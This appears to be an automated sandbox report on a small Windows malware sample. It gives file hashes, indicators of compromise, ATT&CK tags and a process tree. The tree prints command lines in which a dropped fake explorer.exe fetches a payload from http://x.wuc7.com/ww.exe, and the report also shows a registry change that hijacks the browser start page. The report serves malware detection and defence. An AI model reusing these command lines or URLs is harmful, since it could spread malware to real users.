c80f3cd8218d86f5a38c687c3a00b9a229666276abb319bd5557bf8ffe3b923f

Analysis

max time kernel
142s
max time network
121s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
16/07/2024, 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
Size

15KB
MD5

4db4c03f21b2b527672f92a67a4c3cf7
SHA1

412742a333603e242774ca2603c2a11cb1ec5e29
SHA256

c80f3cd8218d86f5a38c687c3a00b9a229666276abb319bd5557bf8ffe3b923f
SHA512

d248f46eea38d84791f6906371b4fc085e8b9adde80615acd2bdc3aeed08c1a300747a0e89c0c2fc4bd2d1a85ab450cdce4ea48abef2fbad0d50488cb1640dcb
SSDEEP

384:UaT42VbMgnbJDJefeprG17ydqYk4hhN/u5Z+Y:DFVw6NVNprG17OqUhvFY

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 15 IoCs

pid	Process
2300	svchost.exe
2612	explorer.exe
2724	explorer.exe
2416	explorer.exe
808	explorer.exe
2888	explorer.exe
1748	explorer.exe
2208	explorer.exe
2892	explorer.exe
1468	explorer.exe
3052	explorer.exe
880	explorer.exe
2812	explorer.exe
2336	explorer.exe
1788	explorer.exe

Loads dropped DLL 59 IoCs

pid	Process
2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
2300	svchost.exe
2300	svchost.exe
2944	WerFault.exe
2944	WerFault.exe
2944	WerFault.exe
2300	svchost.exe
2568	WerFault.exe
2568	WerFault.exe
2568	WerFault.exe
2300	svchost.exe
2544	WerFault.exe
2544	WerFault.exe
2544	WerFault.exe
2300	svchost.exe
2996	WerFault.exe
2996	WerFault.exe
2996	WerFault.exe
2300	svchost.exe
1196	WerFault.exe
1196	WerFault.exe
1196	WerFault.exe
2300	svchost.exe
1560	WerFault.exe
1560	WerFault.exe
1560	WerFault.exe
2300	svchost.exe
1960	WerFault.exe
1960	WerFault.exe
1960	WerFault.exe
2300	svchost.exe
1872	WerFault.exe
1872	WerFault.exe
1872	WerFault.exe
2300	svchost.exe
900	WerFault.exe
900	WerFault.exe
900	WerFault.exe
2300	svchost.exe
2548	WerFault.exe
2548	WerFault.exe
2548	WerFault.exe
2300	svchost.exe
2688	WerFault.exe
2688	WerFault.exe
2688	WerFault.exe
2300	svchost.exe
3068	WerFault.exe
3068	WerFault.exe
3068	WerFault.exe
2300	svchost.exe
1944	WerFault.exe
1944	WerFault.exe
1944	WerFault.exe
2300	svchost.exe
2552	WerFault.exe
2552	WerFault.exe
2552	WerFault.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\svchost.exe	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
File created	C:\Windows\Downloaded Program Files\explorer.exe	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
2944	2612	WerFault.exe	31
2568	2724	WerFault.exe	35
2544	2416	WerFault.exe	38
2996	808	WerFault.exe	41
1196	2888	WerFault.exe	44
1560	1748	WerFault.exe	47
1960	2208	WerFault.exe	50
1872	2892	WerFault.exe	53
900	1468	WerFault.exe	56
2548	3052	WerFault.exe	59
2688	880	WerFault.exe	62
3068	2812	WerFault.exe	65
1944	2336	WerFault.exe	68
2552	1788	WerFault.exe	71

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://luck114.com"	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
2300	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 2300	2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2300	2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2300	2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe	30
PID 2696 wrote to memory of 2300	2696	4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe	30
PID 2300 wrote to memory of 2612	2300	svchost.exe	31
PID 2300 wrote to memory of 2612	2300	svchost.exe	31
PID 2300 wrote to memory of 2612	2300	svchost.exe	31
PID 2300 wrote to memory of 2612	2300	svchost.exe	31
PID 2612 wrote to memory of 2944	2612	explorer.exe	33
PID 2612 wrote to memory of 2944	2612	explorer.exe	33
PID 2612 wrote to memory of 2944	2612	explorer.exe	33
PID 2612 wrote to memory of 2944	2612	explorer.exe	33
PID 2300 wrote to memory of 2724	2300	svchost.exe	35
PID 2300 wrote to memory of 2724	2300	svchost.exe	35
PID 2300 wrote to memory of 2724	2300	svchost.exe	35
PID 2300 wrote to memory of 2724	2300	svchost.exe	35
PID 2724 wrote to memory of 2568	2724	explorer.exe	37
PID 2724 wrote to memory of 2568	2724	explorer.exe	37
PID 2724 wrote to memory of 2568	2724	explorer.exe	37
PID 2724 wrote to memory of 2568	2724	explorer.exe	37
PID 2300 wrote to memory of 2416	2300	svchost.exe	38
PID 2300 wrote to memory of 2416	2300	svchost.exe	38
PID 2300 wrote to memory of 2416	2300	svchost.exe	38
PID 2300 wrote to memory of 2416	2300	svchost.exe	38
PID 2416 wrote to memory of 2544	2416	explorer.exe	40
PID 2416 wrote to memory of 2544	2416	explorer.exe	40
PID 2416 wrote to memory of 2544	2416	explorer.exe	40
PID 2416 wrote to memory of 2544	2416	explorer.exe	40
PID 2300 wrote to memory of 808	2300	svchost.exe	41
PID 2300 wrote to memory of 808	2300	svchost.exe	41
PID 2300 wrote to memory of 808	2300	svchost.exe	41
PID 2300 wrote to memory of 808	2300	svchost.exe	41
PID 808 wrote to memory of 2996	808	explorer.exe	43
PID 808 wrote to memory of 2996	808	explorer.exe	43
PID 808 wrote to memory of 2996	808	explorer.exe	43
PID 808 wrote to memory of 2996	808	explorer.exe	43
PID 2300 wrote to memory of 2888	2300	svchost.exe	44
PID 2300 wrote to memory of 2888	2300	svchost.exe	44
PID 2300 wrote to memory of 2888	2300	svchost.exe	44
PID 2300 wrote to memory of 2888	2300	svchost.exe	44
PID 2888 wrote to memory of 1196	2888	explorer.exe	46
PID 2888 wrote to memory of 1196	2888	explorer.exe	46
PID 2888 wrote to memory of 1196	2888	explorer.exe	46
PID 2888 wrote to memory of 1196	2888	explorer.exe	46
PID 2300 wrote to memory of 1748	2300	svchost.exe	47
PID 2300 wrote to memory of 1748	2300	svchost.exe	47
PID 2300 wrote to memory of 1748	2300	svchost.exe	47
PID 2300 wrote to memory of 1748	2300	svchost.exe	47
PID 1748 wrote to memory of 1560	1748	explorer.exe	49
PID 1748 wrote to memory of 1560	1748	explorer.exe	49
PID 1748 wrote to memory of 1560	1748	explorer.exe	49
PID 1748 wrote to memory of 1560	1748	explorer.exe	49
PID 2300 wrote to memory of 2208	2300	svchost.exe	50
PID 2300 wrote to memory of 2208	2300	svchost.exe	50
PID 2300 wrote to memory of 2208	2300	svchost.exe	50
PID 2300 wrote to memory of 2208	2300	svchost.exe	50
PID 2208 wrote to memory of 1960	2208	explorer.exe	52
PID 2208 wrote to memory of 1960	2208	explorer.exe	52
PID 2208 wrote to memory of 1960	2208	explorer.exe	52
PID 2208 wrote to memory of 1960	2208	explorer.exe	52
PID 2300 wrote to memory of 2892	2300	svchost.exe	53
PID 2300 wrote to memory of 2892	2300	svchost.exe	53
PID 2300 wrote to memory of 2892	2300	svchost.exe	53
PID 2300 wrote to memory of 2892	2300	svchost.exe	53

C:\Users\Admin\AppData\Local\Temp\4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4db4c03f21b2b527672f92a67a4c3cf7_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Internet Explorer start page
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\Fonts\svchost.exe
  C:\Windows\Fonts\svchost.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.1 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2944
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.2 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2568
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.3 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2544
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.4 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2996
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.5 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:1196
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.6 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:1560
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.7 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:1960
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.8 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:2892
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:1872
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.9 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:1468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:900
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.10 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:3052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2548
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.11 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:880
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2688
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.12 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:2812
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:3068
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.13 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:2336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:1944
- - C:\Windows\Downloaded Program Files\explorer.exe
    "C:\Windows\Downloaded Program Files\explorer.exe" 10.127.0.14 http://x.wuc7.com/ww.exe
    3⤵
    - Executes dropped EXE
    PID:1788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 84
      4⤵
      Loads dropped DLL
      Program crash
      PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Windows\Downloaded Program Files\explorer.exe

Filesize
3KB

MD5
d2c3349a566a814a3d793f82ad7d8a65

SHA1
66f23c6633b21702b3ea3a936358907ca35a593e

SHA256
c4bab8beb591701e6fc5b33dea445e05a02703432d88ca90d47e2c5a46e68e23

SHA512
98a8621d2c23853299f1210f626a14500b746995582d34ef362e87b7d5ae172a4ef40356b9a61ff6e1deed53c2f76d79d8c6563ecce161bde2c58bbc66d2b1ef

Download Submit
\Windows\Fonts\svchost.exe

Filesize
13KB

MD5
a1366d2df55732452d78943b7194721c

SHA1
d983728526397bc9f65d2e380eb9a672d5dcca0a

SHA256
1d73be55f889480692a00ba7d49ea26ba68243fe6f94f7c5f1dbd51027239a66

SHA512
bb53e994587819f3f224fd0fb200f271079751fee46f5032083d8ae54f8aa5e825e5e5483c3d705a76b4f92ed9b20ed85641db6d4a49d9121e69058c65d9f744

Download Submit